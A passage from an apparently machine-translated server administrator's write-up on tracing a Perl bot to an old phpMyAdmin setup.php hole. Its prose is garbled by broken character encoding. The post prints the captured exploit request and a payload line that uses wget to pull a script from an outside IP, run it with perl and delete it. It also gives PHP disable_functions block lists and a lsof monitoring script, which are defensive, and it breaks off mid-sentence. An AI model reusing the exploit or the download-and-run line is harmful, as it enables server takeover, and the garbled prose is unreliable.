рдХрд┐рдпрд╛ред рджреЗрдЦрддреЗ рд╕рдордп, рдореИрдВ рдЕрдкрдиреА рдЖрдБрдЦреЛрдВ рд╕реЗ рдирд┐рдореНрди рдкрд╛рда рдЕрдВрд╢ рджреЗрдЦ рд╕рдХрддрд╛ рдерд╛:

@fakeps

/usr/sbin/apache2 -k start

god.txt

HTTP_HOST=[my_ip]..!.......DOCUMENT_ROOT=/var/www/.A.......SCRIPT_FILENAME=/var/www/phpmyadmin3/scripts/setup.php..A.......SCRIPT_NAME=/phpmyadmin3/scripts/setup.php..............!.......PHP_FC

GI_CHILDREN=16....1.......PATH=/sbin:/bin:/usr/sbin:/usr/bin......!.......PWD=/tmp................1.......REMOTE_ADDR=62.193.226.196..............!.......SHLVL=1.................1.......PHP_FCGI_MAX_REQUESTS=10000.............1.......OLDPWD=/

var/www/phpmyadmin3.............!......._=/usr/bin/perl







рд╡рд╛рд╣, рдкрдХрдбрд╝ рд▓рд┐рдпрд╛! рдкрд░реНрд▓ рдХреЛ PHP рд╕реНрдХреНрд░рд┐рдкреНрдЯ /var/www/phpmyadmin3/scripts/setup.php рд╕реЗ рд▓реЙрдиреНрдЪ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛

рд╣рдо Google рдкрд░ рдЪрдврд╝рддреЗ рд╣реИрдВ, "phpmyadmin setup.php рд╢реЛрд╖рдг" рдЯрд╛рдЗрдк рдХрд░рддреЗ рд╣реИрдВ рдФрд░ рдПрдХ рдХрд╛рд░реНрдпрд╢реАрд▓ рд╢реЛрд╖рдг рдкрд╛рддреЗ рд╣реИрдВ: www.securityfocus.com/bid/34236 - рдпрд╣ 2009-03-24 рдХреЛ рдЦреЛрдЬрд╛ рдЧрдпрд╛ рдерд╛, рдпрд╣ phpmyadmin.site рдкрд░ рднреА рд╣реИ: www.phpmyadmin.net/ рд╣реЛрдо_рдкреЗрдЬ / рд╕рд┐рдХреНрдпреЛрд░рд┐рдЯреА / PMASA-2009-3.php рдФрд░ рдХреЗрд╡рд▓ 2.11.9.5 рдФрд░ 3.1.3.1 рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдореЗрдВ рддрдп рдХрд┐рдпрд╛ рдЧрдпрд╛ред



рдпрд╣ phpmyadmin рдореЗрд░реЗ рджреНрд╡рд╛рд░рд╛ рдХрд╛рдлреА рд╕рдордп рд╕реЗ рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ рд╕реЗрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛, рдХреНрдпреЛрдВрдХрд┐ рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рдореЗрдВ 3 рд╕рдВрд╕реНрдХрд░рдг рдирд╣реАрдВ рдереЗ, рд╕рдВрд╕реНрдХрд░рдг 3.0.0-rc2 рдерд╛, рдЕрд░реНрдерд╛рдд рдПрдХ рдкреБрд░рд╛рдирд╛ рдПрдХ, рдЕрднреА рднреА рдПрдХ рдЦрд╛рд▓реА рдЫреЗрдж рдХреЗ рд╕рд╛рде, рдФрд░ рдлрд┐рд░ рдореИрдВ рд╕реБрд░рдХреНрд╖рд┐рдд рд░реВрдк рд╕реЗ рдЗрд╕рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рднреВрд▓ рдЧрдпрд╛ рдФрд░ рдЗрд╕реЗ рдЖрдЬ рддрдХ рдореГрдд рд╡рдЬрди рд▓рдЯрдХрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЫреЛрдбрд╝ рджрд┐рдпрд╛ред



рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдкрд╣рд▓реЗ рд╕реЗ рд╣реА php рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдкрддрд╛ рдЬрд╛рдирдиреЗ рдХреЗ рдмрд╛рдж, рд▓рд╛рдЗрдЯрдЯреИрдк рд▓реЙрдЧ рдореЗрдВ рдХреЙрд▓ рдвреВрдВрдврдирд╛ рд╕рдВрднрд╡ рдерд╛:

62.193.226.196 [my_ip] - [12/Dec/2010:15:54:57 +0300] "GET /phpmyadmin3/scripts/setup.php HTTP/1.1" 200 14083 "http://[my_ip]/phpmyadmin3/scripts/setup.php" "Opera"

62.193.226.196 [my_ip] - [12/Dec/2010:15:54:59 +0300] "POST /phpmyadmin3/scripts/setup.php HTTP/1.1" 200 556203 "http://[my_ip]/phpmyadmin3/scripts/setup.php" "Opera"






рдХреЗрд╡рд▓ рдПрдХ рдЪреАрдЬ рдЬреЛ рдореБрдЭреЗ рд╕рдордЭ рдореЗрдВ рдирд╣реАрдВ рдЖрддреА рд╣реИ рд╡рд╣ рд╣реИ рд╕рдордп рдЕрдВрддрд░, рдЕрдиреБрд░реЛрдз 15:54 рдкрд░ рдерд╛, рдФрд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛ 23:59 рдкрд░ рджрд┐рдЦрд╛рдИ рджреАред



рдореИрдВ рдЕрдм рднреА рдпрд╣ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рдЪрд╛рд╣рддрд╛ рдерд╛ рдХрд┐ рдЙрдиреНрд╣реЛрдВрдиреЗ рдореБрдЭреЗ рдХрд┐рд╕ рддрд░рд╣ рдХрд╛ рдмреЙрдЯ рджрд┐рдпрд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рд╕реНрдХреНрд░рд┐рдкреНрдЯ рддрдХ рдкрд╣реБрдВрдЪ рдХреЛ рд░реЛрдХрдиреЗ рдХреЗ рдмрдЬрд╛рдп, рд╣рдордиреЗ рд╡рд╣рд╛рдВ рдПрдХ рдЬрд╛рд▓ рдмрд┐рдЫрд╛рдпрд╛:

 $loginfo['date']=date('c'); $loginfo['env']=var_export($_ENV,true); $loginfo['get']=var_export($_GET,true); $loginfo['post']=var_export($_POST,true); file_put_contents('log.txt',var_export($loginfo,true),FILE_APPEND);
      
      





рдЬрд╛рд▓ рдХреЛ рдЗрдВрддрдЬрд╛рд░ рдХрд░рдиреЗ рдореЗрдВ рджреЗрд░ рдирд╣реАрдВ рд▓рдЧреА, рдЕрдЧрд▓реЗ рджрд┐рди 22 рдмрдЬреЗ рдпрд╣ рдлрд┐рд░ рд╕реЗ рдЗрд╕ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреА рдЕрдкреАрд▓ рдХреЛ рдкрдХрдбрд╝рддрд╛ рд╣реИ, рдФрд░ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рд╢реЛрд╖рдг рдХреЛрдб рд╣реИ:

  'post' => 'array ( \'action\' => \'lay_navigation\', \'eoltype\' => \'unix\', \'token\' => \'4b179cfc2f788d828bf9ff8d2f122459\', \'configuration\' => \'a:1:{i:0;O:10:\\\\"PMA_Config\\\\":1:{s:6:\\\\"source\\\\";s:44:\\\\" ftp://web1:l33t@85.25.132.71/html/godbot.txt\\\\";}}\', )'
      
      





рдЗрд╕ рдлрд╝рд╛рдЗрд▓ рдХреЛ wget рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ рдФрд░ рджреЗрдЦреЗрдВ:

 <?php system("cd /tmp;killall -9 perl;wget -O god.txt 67.19.118.242/god.txt;perl god.txt;rm -f god.txt*");die;
      
      





рдЗрд╕ рд▓рд┐рдВрдХ рдкрд░ рдЖрдЧреЗ рд╣рдореЗрдВ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдмреЙрдЯ рдХреЛрдб (34 kbytes) рдкреНрд░рд╛рдкреНрдд рд╣реИрдВ, рдЬреЛ рд░реБрдЪрд┐ рд░рдЦрддреЗ рд╣реИрдВ рдЖрдк рдЗрд╕реЗ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред



рдХреБрд▓ рдорд┐рд▓рд╛рдХрд░, рдореИрдВ рдЗрд╕ рдмреЙрдЯ рдХреЗ рдкреНрд░рд╡реЗрд╢ рдХреЗ рд╕реНрд░реЛрдд рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдФрд░ рдмреЙрдЯ рдХрд╛ рдХреЛрдб рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдореЗрдВ рд╕рдлрд▓ рд░рд╣рд╛ред рдпрд╣ рдЫреЗрдж рдкреИрдЪ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд░рд╣рддрд╛ рд╣реИ;)



рдореБрдЭреЗ рдЙрдореНрдореАрдж рд╣реИ рдХрд┐ рдореЗрд░реЗ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд╛ рд╡рд░реНрдгрди рдЕрдиреНрдп рдкреНрд░рд╢рд╛рд╕рдХреЛрдВ рдХреЛ рдЕрдкрдиреЗ рд╕рд░реНрд╡рд░ рдкрд░ рд╕рднреА рдмреБрд░рд╛рдИ рдХреА рдЦреЛрдЬ рдФрд░ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдореЗрдВ рдорджрдж рдХрд░реЗрдЧрд╛ред



рдРрд╕реЗ рдорд╛рдорд▓реЛрдВ рд╕реЗ рдЦреБрдж рдХреЛ рдХреИрд╕реЗ рдмрдЪрд╛рдПрдВ



рд╕рдмрд╕реЗ рдкрд╣рд▓реА рдмрд╛рдд рдЬреЛ рджрд┐рдорд╛рдЧ рдореЗрдВ рдЖрддреА рд╣реИ рд╡рд╣ рдпрд╣ рд╣реИ рдХрд┐ рдЖрдкрдХреЛ рд╕рдордп рдореЗрдВ рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХреЛ рдЕрдкрдбреЗрдЯ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рд╣рд╛рдВ, рдЗрд╕ рд╡рд┐рд╢реЗрд╖ рдорд╛рдорд▓реЗ рдореЗрдВ, рдореЗрд░реА рдЕрдкрдиреА рдЧрд▓рддреА рд╣реИ рдХрд┐ рдореИрдВрдиреЗ phpmyadmin рд╕рдВрд╕реНрдХрд░рдг рдХрд╛ рдкрд╛рд▓рди рдирд╣реАрдВ рдХрд┐рдпрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдЖрдк рд╣реЛрд╕реНрдЯрд┐рдВрдЧ рдкрд░ рдкреНрд░рддреНрдпреЗрдХ рдЧреНрд░рд╛рд╣рдХ рдХреЛ рдЕрдкрдиреЗ phpmyadmin рдХреЛ рд▓рдЧрд╛рддрд╛рд░ рдЕрдкрдбреЗрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдмрд╛рдзреНрдп рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЬрд┐рд╕реЗ рд╡реЗ рд╕рд╛рдЗрдЯ рдкрд░ рдмрд╣реБрдд рдмрд╛рд░ рдЕрдкрд▓реЛрдб рдХрд░рддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рдзреНрдпрд╛рди рд░рдЦреЗрдВ рдХрд┐ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗ рдкреБрд░рд╛рдиреЗ рдЯрдкрдХрд╛ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХреА рдЙрдкрд╕реНрдерд┐рддрд┐ рдЕрдкрд░рд┐рд╣рд╛рд░реНрдп рд╣реИ, рдЗрд╕рд▓рд┐рдП рдкреНрд░рддреНрдпреЗрдХ рдЕрдкрдиреЗ рд╣реЛрдо рдлреЛрд▓реНрдбрд░ рддрдХ рдкрд╣реБрдВрдЪ рд╡рд╛рд▓рд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рд╕рдорд╛рди рд╕рдорд╕реНрдпрд╛рдУрдВ рдХрд╛ рдПрдХ рд╕реНрд░реЛрдд рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдкреНрд░рддреНрдпреЗрдХ рд╕рд╛рдЗрдЯ рдкрд░ рдХреЛрдб рдХреА рд╕реНрд╡рдЪреНрдЫрддрд╛ рдФрд░ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рд▓рд┐рдП рд▓рдбрд╝рдирд╛ рдмреЗрдХрд╛рд░ рд╣реИ, рд╡реИрд╢реНрд╡рд┐рдХ рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрд╛рдп рдХрд┐рдП рдЬрд╛рдиреЗ рдЪрд╛рд╣рд┐рдПред



рдпрд╣ рдкрддрд╛ рдЪрд▓рд╛ рд╣реИ рдХрд┐ рдореВрд▓ php рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рд╡рд╛рд▓рд╛ рдкреНрд░рддреНрдпреЗрдХ рд╕рд░реНрд╡рд░ рд╕рдВрднрд╛рд╡рд┐рдд рд░реВрдк рд╕реЗ рдПрдХ рд╕рдорд╛рди рдЦрддрд░реЗ рд╕реЗ рдЕрд╡рдЧрдд рдХрд░рд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдФрд░ рдпрд╣ рдиреЛрдЯрд┐рд╕ рдХрд░рдирд╛ рд▓рдЧрднрдЧ рдЕрд╕рдВрднрд╡ рд╣реИ рдХрд┐ рдЗрд╕ рддрд░рд╣ рдХреЗ рдмреЙрдЯ рд╕рд░реНрд╡рд░ рдкрд░ рдмрд╕реЗ рд╣реИрдВред рдЗрд╕рд▓рд┐рдП, рдореИрдВ рд╕рд▓рд╛рд╣ рджреЗрддрд╛ рд╣реВрдВ рдХрд┐ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕рдорд╛рди рд╕рдорд╕реНрдпрд╛рдУрдВ рд╕реЗ рдЕрдЧреНрд░рд┐рдо рдореЗрдВ рд╕рд░реНрд╡рд░ рдХреА рд░рдХреНрд╖рд╛ рдХрд░реЗрдВ рдФрд░ рдЕрд╕рд╛рдорд╛рдиреНрдп рдЧрддрд┐рд╡рд┐рдзрд┐ рдХреА рдирд┐рдЧрд░рд╛рдиреА рдХреЛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░реЗрдВред



рдореИрдВрдиреЗ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрд╛рдп рдХрд┐рдП рд╣реИрдВ:



1. рд╕рдХреНрд░рд┐рдп рдХрдиреЗрдХреНрд╢рдиреЛрдВ рдХреА рд╕рдордп-рд╕рдордп рдкрд░ рдирд┐рдЧрд░рд╛рдиреА рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдирд╛, рдЗрд╕рдХреЗ рд╕рд╛рде рдЖрдк рддреБрд░рдВрдд рдЕрд╕рд╛рдорд╛рдиреНрдп рдЧрддрд┐рд╡рд┐рдзрд┐ рдХреЛ рдиреЛрдЯрд┐рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЪрд╛рд╣реЗ рд╡рд╣ php рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗ рд╕рд╛рде рд╕реНрдкреИрдорд┐рдВрдЧ рд╣реЛ рдпрд╛ рд╕рд░реНрд╡рд░ рд╕реЗ рдХрд┐рд╕реА рдмреЙрдЯ рдХреЗ рдХрдиреЗрдХреНрд╢рди рдХреАред рдЗрд╕ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдореЗрдВ, рдореИрдВрдиреЗ рддреБрд░рдВрдд рдЗрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ lsof рдХрдорд╛рдВрдб рдФрд░ рдПрдХ рдореЗрдореЛрд░реА рдбрдВрдк рдХреЛ рдЬреЛрдбрд╝рд╛, рдХреНрдпреЛрдВрдХрд┐ рдЬрдм рддрдХ рдореИрдВ рд╕рд░реНрд╡рд░ рдкрд░ рдкрд╣реБрдБрдЪрддрд╛ рд╣реВрдБ, рддрдм рддрдХ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдХрд╛рдо рдХрд░ рд╕рдХрддреА рд╣реИ рдФрд░ рдЕрдирд▓реЛрдб рдХрд░ рд╕рдХрддреА рд╣реИред



2. рдХрд╛рд░реНрдп рдирд┐рд╖реНрдкрд╛рджрди, рдкреНрд░рдгрд╛рд▓реА, рдЖрджрд┐ рдЪрд▓рд╛рдиреЗ рдкрд░ php рдореЗрдВ рдкреНрд░рддрд┐рдмрдВрдз, рдХреНрдпреЛрдВрдХрд┐ рдЙрдирдХреА рд╢рд╛рдпрдж рд╣реА рдХрднреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ, рдЗрд╕рд▓рд┐рдП рдЕрдзрд┐рдХрд╛рдВрд╢ рдЧреНрд░рд╛рд╣рдХреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЗрди рдлрд╝рдВрдХреНрд╢рдВрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд▓реЙрдЧрд┐рдВрдЧ рдХрд░рдирд╛ рдПрдХ рдЖрджрд░реНрд╢ рд╡рд┐рдХрд▓реНрдк рд╣реЛрдЧрд╛, рд▓реЗрдХрд┐рди рдореБрдЭреЗ рдирд╣реАрдВ рд▓рдЧрд╛ рдХрд┐ рдЗрд╕реЗ рдХреИрд╕реЗ рдХрд░рдирд╛ рд╣реИ (рд╡реИрд╕реЗ, рдХреНрдпрд╛ рдХреЛрдИ рдореБрдЭреЗ рдмрддрд╛ рд╕рдХрддрд╛ рд╣реИ рдХрд┐ рдпрд╣ рдХреИрд╕реЗ рдХрд░рдирд╛ рд╣реИ?) , Php.ini рдореЗрдВ рдкреВрд░реА рд▓рд╛рдЗрди рдирд┐рдореНрдирд╛рдиреБрд╕рд╛рд░ рд╣реИ:

disable_functions = "ini_alter, curl_exec, exec, system, passthru, shell_exec, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, leak, listen, chgrp, apache_note, apache_setenv, closelog, debugger_off, debugger_on, define_sys

log_variables, openlog, syslog,ftp_exec,dl"








рдореИрдВ habrayuzers рдХреА рдЯрд┐рдкреНрдкрдгрд┐рдпреЛрдВ рдХреЛ рд╕реБрдирдирд╛ рдЪрд╛рд╣реВрдВрдЧрд╛ рдХрд┐ рдХреНрдпрд╛ рдореИрдВрдиреЗ рд╕реБрд░рдХреНрд╖рд╛ рд╡рд┐рдзрд┐рдпреЛрдВ рдХреЛ рд╕рд╣реА рддрд░реАрдХреЗ рд╕реЗ рдЪреБрдирд╛ рд╣реИ рдФрд░ рдЬреЛ рдореЗрд░реЗ рд╕рд░реНрд╡рд░ рдкрд░ рдРрд╕реЗ рдорд╛рдорд▓реЛрдВ рдХреЗ рдЦрд┐рд▓рд╛рдл рд╕реБрд░рдХреНрд╖рд╛ рдмрдирд╛рддрд╛ рд╣реИред



рд╕рд╛рде рд╣реА, рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреНрд░рд╢реНрди рдореЗрд░реЗ рд▓рд┐рдП рдЦреБрд▓реЗ рд░рд╣реЗ:

  1. рдореИрдВ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдорд╛рд░реНрдЧ рдХрд╛ рдкрддрд╛ рдХреИрд╕реЗ рд▓рдЧрд╛ рд╕рдХрддрд╛ рд╣реВрдВ рдФрд░ рдЗрд╕рдХреЗ рд▓рд┐рдП рдкрде, рдпрджрд┐ рдпрд╣ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рджреНрд╡рд╛рд░рд╛ рдЕрдзрд┐рд▓реЗрдЦрд┐рдд рд╣реЛ рдЬрд╛рддрд╛ рд╣реИ, рдмрд┐рдирд╛ рдореЗрдореЛрд░реА рдбрдВрдк рдХрд╛ рд╕рд╣рд╛рд░рд╛ рд▓рд┐рдП рдФрд░ рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ рджрд░рд╛рд░реЗрдВ рджреЗрдЦрдиреЗ рдХреЗ рдмрд┐рдирд╛?
  2. рдХреИрд╕реЗ рд▓рд┐рдирдХреНрд╕ рдореЗрдВ рдЖрдк tcpdump рдпрд╛ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдПрдХ рд╕рдорд╛рди рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рднреА рдпрд╛рддрд╛рдпрд╛рдд рдХреЛ рд░реЛрдХ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рдЗрд╕рдХреА рдЬрд╛рдирдХрд╛рд░реА?
  3. рдХреНрдпрд╛ рдХрдиреЗрдХреНрд╢рди рдореЗрдВ рдЧреИрд░-рдорд╛рдирдХ рд╕рд░реНрд╡рд░ рдЧрддрд┐рд╡рд┐рдзрд┐ рдХреА рдирд┐рдЧрд░рд╛рдиреА рдХреЗ рд▓рд┐рдП рдХреЛрдИ рддреИрдпрд╛рд░ рд╕рдорд╛рдзрд╛рди рд╣реИрдВ?
  4. рдХреНрдпрд╛ рдирд┐рд╖реНрдкрд╛рджрди рдХрд╛рд░реНрдпреЛрдВ рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдФрд░ рдЗрд╕ рддрд░рд╣ php рдХреЛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░рдиреЗ рдХрд╛ рдХреЛрдИ рддрд░реАрдХрд╛ рд╣реИ?


UPD ред: рд╡реИрд╕реЗ, рдпрд╣ рдЫреЗрдж рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рд╕реЗ phpmyadmin рдореЗрдВ рдмрдВрдж рдирд╣реАрдВ рд╣реЛ рд╕рдХрддрд╛ рд╣реИ, рдЖрдкрдХреЛ рдзреНрдпрд╛рди рд╕реЗ рдбреЙрдХ рджреЗрдЦрдиреЗ рдХреА рдЬрд░реВрд░рдд рд╣реИред рдЫреЗрдж рдХреЗрд╡рд▓ 2.11.9.5 рдФрд░ 3.1.3.1 рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдореЗрдВ рдкреИрдЪ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред рд▓реЗрдХрд┐рди рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдбреЗрдмрд┐рдпрди рд▓реЗрдиреА рдореЗрдВ 4: 2.11.8.1-5 + lenn6 рдЬрд╛рддрд╛ рд╣реИ, рдФрд░ рдЫреЗрдж рдПрдХ рдЕрд▓рдЧ рдкреИрдЪ рдХреЗ рд╕рд╛рде рдмрдВрдж рд╣реЛ рдЬрд╛рддрд╛ рд╣реИ -http: //www.debian.org/security-2009/dsa-1824

рдЗрд╕ рдЫреЗрдж рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА: www.phpmyadmin.net/home_page/security/PMASA-2009-3.pp



UPD2: рдХреНрдпрд╛ рдореИрдВ рдХрд┐рд╕реА рддрд░рд╣ рд╕реЗ рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░ рд╕рдХрддрд╛ рд╣реВрдВ (рдЬрд╣рд╛рдВ рддрдХ тАЛтАЛрдореИрдВ рд▓рд┐рдирдХреНрд╕ рдХреЗ рд▓рд┐рдП рд╕рдордЭрддрд╛ рд╣реВрдВ рдХрд┐ рдпрд╣ iptables рд╣реЛрдЧрд╛) рд╡рд┐рд╢рд┐рд╖реНрдЯ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ рдиреЗрдЯрд╡рд░реНрдХ рддрдХ рдкрд╣реБрдВрдЪ рдХреЛ рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдХрд░рддрд╛ рд╣реИ? рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рд╕рднреА рдкрд░реНрд▓ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЛ рдмрд╛рд╣рд░ рд╕реЗ рдЬреЛрдбрд╝рдиреЗ рдХреЗ рд▓рд┐рдП рдордирд╛ рдХрд░рдирд╛ред рдПрдВрдбреНрд░реЙрдЗрдб рдУрдПрд╕ (рдпрд╣ рд▓рд┐рдирдХреНрд╕ рдХрд░реНрдиреЗрд▓ рдкрд░ рднреА рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ) рдореЗрдВ рдПрдХ DroidWall рдкреНрд░реЛрдЧреНрд░рд╛рдо рд╣реИ рдЬреЛ рдЖрдкрдХреЛ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ рдХреЗ рд▓рд┐рдП рдиреЗрдЯрд╡рд░реНрдХ рддрдХ рдкрд╣реБрдВрдЪрдиреЗ / рдЕрд╕реНрд╡реАрдХрд╛рд░ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдмреБрдирд┐рдпрд╛рджреА рд▓рд┐рдирдХреНрд╕ рд╡рд┐рддрд░рдг (рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдбреЗрдмрд┐рдпрди) рдореЗрдВ, рдХреБрдЫ рд╕рдордЭ рдирд╣реАрдВ рдЖрдпрд╛ рдХрд┐ рдХреНрдпрд╛ рдпрд╣ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред



UPD3: рдЯрд┐рдкреНрдкрдгрд┐рдпреЛрдВ рдФрд░ рдкрддреНрд░реЛрдВ рдХреЗ рдЖрдзрд╛рд░ рдкрд░, рдореИрдВрдиреЗ рдХрд╛рд░реНрдпреЛрдВ рдХреА рдПрдХ рд╕реВрдЪреА рдЬреЛрдбрд╝реА рдФрд░ рдХреБрдЫ рдЕрдирд╛рд╡рд╢реНрдпрдХ рд▓реЛрдЧреЛрдВ рдХреЛ рдмрд╛рд╣рд░ рдирд┐рдХрд╛рд▓ рджрд┐рдпрд╛:

disable_functions = "apache_setenv, chown, chgrp, closelog, define_syslog_variables, dl, exec, ftp_exec, openlog, passthru, pcntl_exec, popen, posix_getegid, posix_geteuid, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_open, proc_terminate, shell_exec, syslog, system"







UPD4: рджрд░реНрд╢рдХреЛрдВ рдХреЗ рдЕрдиреБрд░реЛрдз рдкрд░ рдФрд░ рдЕрддрд┐рд░рд┐рдХреНрдд:

рд╕рдХреНрд░рд┐рдп рдХрдиреЗрдХреНрд╢рди рдХреА рдЬрд╛рдБрдЪ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕реНрдХреНрд░рд┐рдкреНрдЯ: (рдпрд╣ рдореЗрд░реА рд╡реНрдпрдХреНрддрд┐рдЧрдд рдЬрд░реВрд░рддреЛрдВ рдХреЗ рд▓рд┐рдП рдХреЗрд╡рд▓ рдШреБрдЯрдиреЗ рдкрд░ рдЬрд▓реНрджреА рд╕реЗ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ рдерд╛)

 $out=system("lsof -nP -i :80,443,25 +c 15 | grep -v -E '^(COMMAND|apache2|zabbix|smtpd?|master|scache|host|lighttpd)' | grep -v 'wget.*>[my_ip]:80'"); if(strlen($out)) { $arr=explode("\n",$out); foreach($arr as $str) { echo $str."\n"; $spl=preg_split("/\s+/",$str); echo `ps -f -p {$spl[1]}`."\n\n"; echo `lsof -p {$spl[1]}`."\n\n"; }
      
      





рдФрд░ рдореИрдВ рдЗрд╕реЗ рдХреНрд░реЛрди рдореЗрдВ рд╣рд░ 30 рдорд┐рдирдЯ рдХреЗ рд▓рд┐рдП рдкрдВрдЬреАрдХреГрдд рдХрд░рддрд╛ рд╣реВрдВред рдпрджрд┐ рд╡рд╣ рд╕реНрдЯрд╛рд░реНрдЯрдЕрдк рдкрд░ рдХреБрдЫ рдЕрдзрд┐рдХ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рддрд╛ рд╣реИ, рддреЛ рд╣рдо рд╕реВрдЪреА рдореЗрдВ grep рдЬреЛрдбрд╝рддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рдпрд╣ рд╣рд╕реНрддрдХреНрд╖реЗрдк рди рдХрд░реЗред рдирддреАрдЬрддрди, рдЕрдЧрд░ рдХреБрдЫ рдмрдЪрд╛ рд╣реБрдЖ рджрд┐рдЦрд╛рдИ рджреЗрддрд╛ рд╣реИ рдЬреЛ рдпрд╛ рддреЛ рд╕реНрдкреИрдо рдХрд░рдиреЗ рдпрд╛ рдХреБрдЫ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддрд╛ рд╣реИ, рддреЛ рддреБрд░рдВрдд рдХреНрд░реЙрди рдореБрдЭреЗ рдореЗрд▓ рджреНрд╡рд╛рд░рд╛ 